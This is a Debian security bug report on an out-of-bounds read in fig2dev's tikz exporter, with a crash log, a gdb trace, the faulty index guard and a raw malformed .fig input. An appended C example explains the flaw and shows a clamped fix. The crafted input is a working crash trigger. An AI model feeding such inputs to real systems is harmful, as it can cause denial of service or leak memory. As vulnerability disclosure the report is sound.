Package: fig2dev
Version: 1:3.2.6a-4
Severity: important
Tags: security

Out-of-bounds read while running fig2dev with the -L tikz option
Running 'fig2dev -L tikz poc' with the attached file raises an out-of-bounds read bug which may allow a remote attacker to cause a denial of service or information disclosure with a crafted file. I expected the program to terminate without a segfault, but the program crashes as follows.

I sent this to the Debian security team before, but I didn't get any response, so I am sending this to the public.

=======================================================
june@june:~/project/analyze/poc/fig2dev/crash1$ fig2dev -L tikz poc
\ifx\XFigwidth\undefined\dimen1=0pt\else\dimen1\XFigwidth\fi
\divide\dimen1 by 1
\ifx\XFigheight\undefined\dimen3=0pt\else\dimen3\XFigheight\fi
\divide\dimen3 by 5
\ifdim\dimen1=0pt\ifdim\dimen3=0pt\dimen1=-9223372036854775808sp\dimen3\dimen1
\else\dimen1\dimen3\fi\else\ifdim\dimen3=0pt\dimen3\dimen1\fi\fi
\tikzpicture[x=+\dimen1, y=+\dimen3]
{\ifx\XFigu\undefined\catcode`\@11
\def\temp{\alloc@1\dimen\dimendef\insc@unt}\temp\XFigu\catcode`\@12\fi}
\XFigu-9223372036854775808sp
% Uncomment to scale line thicknesses with the same
% factor as width of the drawing.
%\pgfextractx\XFigu{\pgfqpointxy{1}{1}}
\ifdim\XFigu<0pt\XFigu-\XFigu\fi
\clip(91,-1) rectangle (92,4);
\tikzset{inner sep=+0pt, outer sep=+0pt}
Segmentation fault

[debugging]
Program received signal SIGSEGV, Segmentation fault.
strlen () at ../sysdeps/x86_64/strlen.S:106
106     ../sysdeps/x86_64/strlen.S: No such file or directory.
(gdb) bt
#0  strlen () at ../sysdeps/x86_64/strlen.S:106
#1  0x00007ffff7339d78 in _IO_vfprintf_internal (s=0x7ffff768b600 <_IO_2_1_stdout_>, format=<optimized out>, ap=ap@entry=0x7fffffffde88) at vfprintf.c:1637
#2  0x00007ffff7340157 in __fprintf (stream=<optimized out>, format=format@entry=0x5555555cc7e5 "\\normalfont%s ") at fprintf.c:32
#3  0x00005555555b4615 in put_font (t=0x555555810160) at gentikz.c:1725
#4  gentikz_text (t=0x555555810160) at gentikz.c:1769
#5  0x00005555555618cd in gendev_objects (dev=0x5555557f8ec0 <dev_tikz>, objects=0x7fffffffdfa0) at fig2dev.c:833
#6  main (argc=<optimized out>, argv=<optimized out>) at fig2dev.c:467
(gdb) x/i $rip
=> 0x7ffff7371646 <strlen+38>:  movdqu (%rax),%xmm4
(gdb) i r rax
rax            0x29292922       690563362
(gdb) f 3
#3  0x00005555555b4615 in put_font (t=0x555555810160) at gentikz.c:1725
1725                    fprintf(tfp, "\\normalfont%s ",
(gdb) p t->font
$1 = -51
(gdb) p texfonts[-51]
$3 = 0x29292922 <error: Cannot access memory at address 0x29292922>

With the attached file, t->font can be set to a negative value, which causes this bug.

[fig2dev/dev/gentikz.c]
1724            else
1725                    fprintf(tfp, "\\normalfont%s ",
1726                            texfonts[t->font <= MAX_FONT ? t->font : MAX_FONT - 1]);
=======================================================

This bug was found with a fuzzer developed by the 'SoftSec' group at KAIST.
-- System Information:
Debian Release: buster/sid
  APT prefers unstable-debug
  APT policy: (500, 'unstable-debug'), (500, 'testing-debug'), (500, 'stable-updates'), (500, 'testing'), (500, 'stable'), (1, 'experimental-debug')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-3-amd64 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US:en (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages fig2dev depends on:
ii  gawk         1:4.1.4+dfsg-1
ii  libc6        2.24-17
ii  libpng16-16  1.6.34-1
ii  libxpm4      1:3.5.12-1
ii  x11-common   1:7.7+19

Versions of packages fig2dev recommends:
ii  ghostscript  9.22~dfsg-1
ii  netpbm       2:10.0-15.3+b2

Versions of packages fig2dev suggests:
pn  xfig  <none>

-- no debconf information
1 1 1 11 4-51 11 0 5 1 91 1 c!!!!
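As an added example, not the reporter's code and not fig2dev's own, the C program below shows why the guard quoted from gentikz.c:1726 lets a negative font number through (it only caps values above MAX_FONT) and what a clamped replacement looks like. The texfonts[] contents, the value of MAX_FONT, the parse_fig_text_font() helper and the .fig text-object line are all constructed stand-ins for illustration; fig2dev's real table and constants differ.

```c
/* Added example (not fig2dev's code): why the index guard quoted from
 * gentikz.c misses a negative font number, and a clamped replacement.
 * The table contents, the value of MAX_FONT and the .fig line below
 * are constructed stand-ins; fig2dev's real values differ. */
#include <stdio.h>
#include <string.h>

#define MAX_FONT 4                      /* assumed table size, not fig2dev's */

/* Stand-in for texfonts[]: one LaTeX font switch per font number. */
static const char *texfonts[MAX_FONT] = {
    "\\rmfamily", "\\sffamily", "\\ttfamily", "\\itshape"
};

/* Same shape as the guard in gentikz.c:1726. It only caps large values:
 * a negative font number passes straight through, and font == MAX_FONT
 * is also accepted, which is one past the end of a MAX_FONT-sized table. */
int unsafe_font_index(int font)
{
    return font <= MAX_FONT ? font : MAX_FONT - 1;
}

/* Hardened lookup: reject both ends of the range and fall back to
 * font 0, so fprintf never receives a pointer read from outside the table. */
int safe_font_index(int font)
{
    if (font < 0 || font >= MAX_FONT)
        return 0;
    return font;
}

/* True if idx is a valid subscript of texfonts[]. */
int index_in_bounds(int idx)
{
    return idx >= 0 && idx < MAX_FONT;
}

/* The font name the hardened code would pass to "\\normalfont%s ". */
const char *safe_font_name(int font)
{
    return texfonts[safe_font_index(font)];
}

/* Extracts the font field of a .fig text object (object code 4):
 *   4 sub_type color depth pen_style font font_size ...
 * Returns 0 if the line is not a text object or is too short. */
int parse_fig_text_font(const char *line, int *font_out)
{
    int type, sub_type, color, depth, pen_style, font;
    if (sscanf(line, "%d %d %d %d %d %d",
               &type, &sub_type, &color, &depth, &pen_style, &font) != 6)
        return 0;
    if (type != 4)
        return 0;
    *font_out = font;
    return 1;
}

/* Constructed text-object line carrying the font number -51 seen in the
 * gdb session above; these are not the bytes of the attached poc file. */
static const char poc_text_line[] =
    "4 0 0 50 -1 -51 12 0.0000 4 15 60 0 0 text\\001";

int poc_font(void)
{
    int font = 0;
    return parse_fig_text_font(poc_text_line, &font) ? font : 0;
}

int main(void)
{
    int font = poc_font();
    int idx = unsafe_font_index(font);
    printf("font %d -> original guard picks index %d (%s)\n",
           font, idx, index_in_bounds(idx) ? "in bounds" : "OUT OF BOUNDS");
    printf("font %d -> clamped guard picks index %d (%s)\n",
           font, safe_font_index(font), safe_font_name(font));
    return 0;
}
```

The original guard also admits font == MAX_FONT; whether that is one past the end depends on how many entries fig2dev's texfonts[] actually has, which the report does not show, so the clamped version above rejects it on the assumption that the table has exactly MAX_FONT entries.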